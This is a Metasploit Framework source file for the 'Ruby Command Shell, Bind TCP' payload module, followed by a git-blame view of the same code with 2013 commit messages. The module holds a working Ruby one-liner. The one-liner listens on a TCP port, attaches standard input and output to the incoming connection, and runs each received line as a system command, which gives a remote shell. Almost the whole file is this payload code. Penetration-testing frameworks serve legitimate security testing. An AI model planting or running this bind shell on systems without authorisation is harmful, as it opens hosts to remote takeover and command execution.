modules/payloads/singles/ruby/shell_bind_tcp.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'msf/core/payload/ruby'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'

module Metasploit3

	include Msf::Payload::Single
	include Msf::Payload::Ruby
	include Msf::Sessions::CommandShellOptions

	def initialize(info = {})
		super(merge_info(info,
			'Name'        => 'Ruby Command Shell, Bind TCP',
			'Description' => 'Continually listen for a connection and spawn a command shell via Ruby',
			'Author'      => [ 'kris katterjohn', 'hdm' ],
			'License'     => MSF_LICENSE,
			'Platform'    => 'ruby',
			'Arch'        => ARCH_RUBY,
			'Handler'     => Msf::Handler::BindTcp,
			'Session'     => Msf::Sessions::CommandShell,
			'PayloadType' => 'ruby',
			'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
		))
	end

	def generate
		return prepends(ruby_string)
	end

	def ruby_string
		"require 'socket';s=TCPServer.new(\"#{datastore['LPORT']}\");c=s.accept;s.close;$stdin.reopen(c);$stdout.reopen(c);$stderr.reopen(c);$stdin.each_line{|l|l=l.strip;next if l.length==0;system(l)}"
	end
end
Revert "Rename again to be consistent with payload naming" 2013-01-10 15:24:25 -06:00			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
			`##`

			`require 'msf/core'`
Move fork stuff out of exploit into payload mixin 2013-01-28 21:34:39 -06:00			`require 'msf/core/payload/ruby'`
Revert "Rename again to be consistent with payload naming" 2013-01-10 15:24:25 -06:00			`require 'msf/core/handler/bind_tcp'`
			`require 'msf/base/sessions/command_shell'`
			`require 'msf/base/sessions/command_shell_options'`

			`module Metasploit3`

			`include Msf::Payload::Single`
Move fork stuff out of exploit into payload mixin 2013-01-28 21:34:39 -06:00			`include Msf::Payload::Ruby`
Revert "Rename again to be consistent with payload naming" 2013-01-10 15:24:25 -06:00			`include Msf::Sessions::CommandShellOptions`

			`def initialize(info = {})`
			`super(merge_info(info,`
			`'Name' => 'Ruby Command Shell, Bind TCP',`
			`'Description' => 'Continually listen for a connection and spawn a command shell via Ruby',`
			`'Author' => [ 'kris katterjohn', 'hdm' ],`
			`'License' => MSF_LICENSE,`
			`'Platform' => 'ruby',`
			`'Arch' => ARCH_RUBY,`
			`'Handler' => Msf::Handler::BindTcp,`
			`'Session' => Msf::Sessions::CommandShell,`
			`'PayloadType' => 'ruby',`
			`'Payload' => { 'Offsets' => {}, 'Payload' => '' }`
			`))`
			`end`

			`def generate`
Move fork stuff out of exploit into payload mixin 2013-01-28 21:34:39 -06:00			`return prepends(ruby_string)`
Revert "Rename again to be consistent with payload naming" 2013-01-10 15:24:25 -06:00			`end`

			`def ruby_string`
			`"require 'socket';s=TCPServer.new(\"#{datastore['LPORT']}\");c=s.accept;s.close;$stdin.reopen(c);$stdout.reopen(c);$stderr.reopen(c);$stdin.each_line{\|l\|l=l.strip;next if l.length==0;system(l)}"`
			`end`
			`end`